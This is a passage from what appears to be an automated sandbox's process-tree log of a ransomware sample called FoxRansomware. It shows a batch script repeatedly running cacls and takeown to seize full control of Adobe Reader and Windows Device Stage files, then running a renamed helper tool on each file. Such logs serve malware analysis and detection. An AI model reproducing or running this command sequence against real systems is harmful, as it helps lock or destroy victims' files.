    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CourierStd.otf" -nobanner
    3⤵
    PID:2180
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "CourierStd.otf" -nobanner
      4⤵
      PID:2764
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3236
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm""
  2⤵
  PID:2072
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm" /E /G Admin:F /C
    3⤵
    PID:2992
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\zx______.pfm"
    3⤵
    PID:3780
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "zx______.pfm" -nobanner
    3⤵
    PID:3272
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "zx______.pfm" -nobanner
      4⤵
      PID:2012
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3420
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt""
  2⤵
  PID:2128
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt" /E /G Admin:F /C
    3⤵
    PID:1820
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US_POSIX.txt"
    3⤵
    PID:3100
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
    3⤵
    PID:2896
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "DisplayLanguageNames.en_US_POSIX.txt" -nobanner
      4⤵
      PID:3076
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1704
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx""
  2⤵
  PID:3440
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx" /E /G Admin:F /C
    3⤵
    PID:3796
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can32.clx"
    3⤵
    - Modifies file permissions
    PID:1008
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "can32.clx" -nobanner
    3⤵
    PID:3160
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "can32.clx" -nobanner
      4⤵
      PID:2100
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4024
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt""
  2⤵
  PID:2400
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt" /E /G Admin:F /C
    3⤵
    PID:1468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\symbol.txt"
    3⤵
    PID:4212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "symbol.txt" -nobanner
    3⤵
    PID:2584
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "symbol.txt" -nobanner
      4⤵
      PID:3164
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4220
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT""
  2⤵
  PID:4276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT" /E /G Admin:F /C
    3⤵
    PID:4304
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\SYMBOL.TXT"
    3⤵
    PID:3340
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "SYMBOL.TXT" -nobanner
    3⤵
    PID:4328
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "SYMBOL.TXT" -nobanner
      4⤵
      PID:4300
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4272
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png""
  2⤵
  PID:4416
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png" /E /G Admin:F /C
    3⤵
    PID:4392
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png"
    3⤵
    PID:4376
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "watermark.png" -nobanner
    3⤵
    PID:3772
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "watermark.png" -nobanner
      4⤵
      PID:4396
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3344
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml""
  2⤵
  PID:4452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\en-US\resource.xml"
    3⤵
    PID:4524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4512
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4440
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4432
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml""
  2⤵
  PID:1040
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4584
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\en-US\resource.xml"
    3⤵
    PID:820
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4636
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4660
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4652
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml""
  2⤵
  PID:4700
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml" /E /G Admin:F /C
    3⤵
    PID:4352
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\fr-FR\resource.xml"
    3⤵
    - Modifies file permissions
    PID:4696
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:4484
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:4760
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif""
  2⤵
  PID:4628
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif" /E /G Admin:F /C
    3⤵
    PID:4676
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\br.gif"
    3⤵
    - Modifies file permissions
    PID:2212
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "br.gif" -nobanner
    3⤵
    PID:4724
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "br.gif" -nobanner
      4⤵
      PID:4888
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1116
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif""
  2⤵
  PID:4800
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif" /E /G Admin:F /C
    3⤵
    PID:4824
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif"
    3⤵
    - Modifies file permissions
    PID:564
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "form_responses.gif" -nobanner
    3⤵
    PID:4928
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "form_responses.gif" -nobanner
      4⤵
      PID:4836
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4936
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif""
  2⤵
  PID:3500
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif" /E /G Admin:F /C
    3⤵
    PID:4984
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_email.gif"
    3⤵
    PID:2592
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "review_email.gif" -nobanner
    3⤵
    PID:5024
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "review_email.gif" -nobanner
      4⤵
      PID:5016
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4832
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif""
  2⤵
  PID:5000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif" /E /G Admin:F /C
    3⤵
    PID:4988
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif"
    3⤵
    - Modifies file permissions
    PID:4900
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "tr.gif" -nobanner
    3⤵
    PID:5020
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "tr.gif" -nobanner
      4⤵
      PID:5112
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:5012
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf""
  2⤵
  PID:5080
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf" /E /G Admin:F /C
    3⤵
    PID:5052
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf"
    3⤵
    PID:4876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "AdobePiStd.otf" -nobanner
    3⤵
    PID:4968
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "AdobePiStd.otf" -nobanner
      4⤵
      PID:3996
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:864
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf""
  2⤵
  PID:3276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:5084
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf"
    3⤵
    PID:1528
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
    3⤵
    PID:2404
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "MyriadPro-BoldIt.otf" -nobanner
      4⤵
      PID:3932
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3200
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt""
  2⤵
  PID:4940
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt" /E /G Admin:F /C
    3⤵
    PID:3868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt"
    3⤵
    PID:3664
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
    3⤵
    PID:572
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "DisplayLanguageNames.en_CA.txt" -nobanner
      4⤵
      PID:3748
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca""
  2⤵
  PID:2468
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca" /E /G Admin:F /C
    3⤵
    PID:1748
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.fca"
    3⤵
    PID:2112
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "can.fca" -nobanner
    3⤵
    PID:3984
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "can.fca" -nobanner
      4⤵
      PID:3992
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1440
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths""
  2⤵
  PID:520
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths" /E /G Admin:F /C
    3⤵
    PID:1492
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths"
    3⤵
    - Modifies file permissions
    PID:1532
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "usa03.ths" -nobanner
    3⤵
    PID:2284
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "usa03.ths" -nobanner
      4⤵
      PID:3896
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3636
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT""
  2⤵
  PID:2928
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT" /E /G Admin:F /C
    3⤵
    PID:108
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\GREEK.TXT"
    3⤵
    - Modifies file permissions
    PID:1404
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "GREEK.TXT" -nobanner
    3⤵
    PID:2948
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "GREEK.TXT" -nobanner
      4⤵
      PID:3716
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2820
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT""
  2⤵
  PID:1132
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT" /E /G Admin:F /C
    3⤵
    PID:1176
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1253.TXT"
    3⤵
    - Modifies file permissions
    PID:3844
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "CP1253.TXT" -nobanner
    3⤵
    PID:3672
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "CP1253.TXT" -nobanner
      4⤵
      PID:1020
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3800
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""
  2⤵
  PID:3496
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"
    3⤵
    - Modifies file permissions
    PID:3936
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:1716
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:1732
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:788
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml""
  2⤵
  PID:1276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml" /E /G Admin:F /C
    3⤵
    PID:3884
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Device Stage\Task\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\de-DE\resource.xml"
    3⤵
    - Modifies file permissions
    PID:3840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "resource.xml" -nobanner
    3⤵
    PID:2428
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "resource.xml" -nobanner
      4⤵
      PID:3956
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4092
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat""
  2⤵
  PID:1308
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat" /E /G Admin:F /C
    3⤵
    PID:3472
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\ProgramData\Microsoft\Network\Downloader\qmgr1.dat"
    3⤵
    PID:4088
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "qmgr1.dat" -nobanner
    3⤵
    PID:2656
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "qmgr1.dat" -nobanner
      4⤵
      PID:3608
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3948
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\i5Qs0ZAO.bat" "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml""
  2⤵
  PID:3512
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml" /E /G Admin:F /C
    3⤵
    PID:3384
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\behavior.xml"
    3⤵
    PID:2356
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c sOCkujKF.exe -accepteula "behavior.xml" -nobanner
    3⤵
    PID:2192
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
      sOCkujKF.exe -accepteula "behavior.xml" -nobanner
      4⤵
      PID:3452
- - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\sOCkujKF.exe
    sOCkujKF.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1912
- C:\Windows\SysWOW64\cmd.exe
